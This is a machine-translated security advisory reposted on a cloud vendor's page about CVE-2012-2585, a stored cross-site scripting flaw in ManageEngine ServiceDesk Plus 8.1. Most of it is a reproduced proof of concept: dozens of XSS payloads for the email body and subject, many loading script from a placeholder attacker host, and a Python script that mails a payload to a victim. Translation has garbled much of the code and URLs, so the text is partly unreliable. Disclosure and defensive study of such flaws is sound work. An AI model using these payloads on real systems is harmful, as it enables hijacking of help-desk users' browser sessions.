Home > Cloud Computing > Cloud Security

ManageEngine Service Desk Plus email body script insertion Vulnerability

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Release date:
Updated on:

Affected Systems:
ManageEngine ServiceDesk Plus 8.x
Description:
--------------------------------------------------------------------------------
Cve id: CVE-2012-2585

ManageEngine Service Desk Plus is a customizable help desktop software.

ManageEngine Service Desk Plus 8.1 and other versions are used in requests if the email body is not properly filtered. arbitrary HTML and script code can be inserted, after being viewed, it is executed in the user browser session of the affected site.

<* Source: loneferret

Link: http://secunia.com/advisories/50198/
Http://www.exploit-db.com/exploits/20356/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Loneferret () provides the following test methods:


#! /Usr/bin/python

'''
Author: loneferret of Offensive Security
Product: ManageEngine Service Desk Plus (Windows standard)
Version: 8.1
Vendor Site: http://www.manageengine.com
Software Download: http://www.manageengine.com/products/service-desk/download.html

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
27 Jul 2012: Vendor requested additional information
30 Jul 2012: Additional proofs of concept provided to vendor
03 Aug 2012: Vendor acknowledged receept of PoC and declares intent to fix
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9


Injection Point: Body
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) // --> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <SCRIPT> alert ('xsss') </SCRIPT>
3: <script src = http: // attacker/xss. js> </SCRIPT>
4: <iframe src = "javascript: alert ('xss');"> </IFRAME>
5: exp/* <xss style = 'no \ xss: noxss ("*//*");
Xss: & #101; x & # x2F; * XSS * // */expression (alert ("XSS") '>
6:
7: <xss style = "xss: expression (alert ('xsss')">
8: <script src = "http: // attacker/xss.jpg"> </SCRIPT>
9: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
10: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
11: <script src = // attacker/. j>
12: <SCRIPT> alert ("XSS"); // </SCRIPT>
13: <SCRIPT> alert ("XSS") </SCRIPT> ">
14: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
15: <SCRIPT = "blah" SRC = "http: // attacker/xss. js"> </SCRIPT>
16: <SCRIPT a = "blah" ''src = "http: // attacker/xss. js"> </SCRIPT>
17: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
18: <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT>
19: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
20: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>

Injection Point: Subject
Injection Payload (s ):
1: <SCRIPT> alert ('xsss') </SCRIPT>
2: <script src = http: // attacker/xss. js> </SCRIPT>
3: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
4: <div style = "width: expression (alert ('xsss');">
5: <iframe src = "javascript: alert ('xss');"> </IFRAME>
6: <META HTTP-EQUIV = "refresh" CONTENT = "0; url = data: text/html; base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
7: <META HTTP-EQUIV = "refresh" CONTENT = "0; URL = http: //; URL = javascript: alert ('xss');">
8:
9: <xss style = "xss: expression (alert ('xsss')">
10: <script src = "http: // attacker/xss.jpg"> </SCRIPT>
11: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
12: <SCRIPT/xss src = "http: // attacker/xss. js"> </SCRIPT>
13: <script src = http: // attacker/xss. js
14: <script src = // attacker/. j>
15: <iframe src = http: // attacker/scriptlet.html <
16: <SCRIPT> alert ("XSS"); // </SCRIPT>
17: <SCRIPT> alert ("XSS") </SCRIPT> ">
18: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
19: <SCRIPT = "blah" SRC = "http: // attacker/xss. js"> </SCRIPT>
20: <SCRIPT a = "blah" ''src = "http: // attacker/xss. js"> </SCRIPT>
21: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
22: <SCRIPT a = '> 'src = "http: // attacker/xss. js"> </SCRIPT>
23: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
24: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>

'''

Import smtplib, urllib2

Payload = "" </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT> """

Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local \ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: XSS" + payload + "\ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS. \ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()

Username = "hacker@offsec.local"
Password = "123456"
Dstemail = "victim@victim.local"
Frmemail = "hacker@offsec.local"
Smtpsrv = "172.16.84.171"

Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

ManageEngine
------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.manageengine.com/products/opmanager/index.html

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More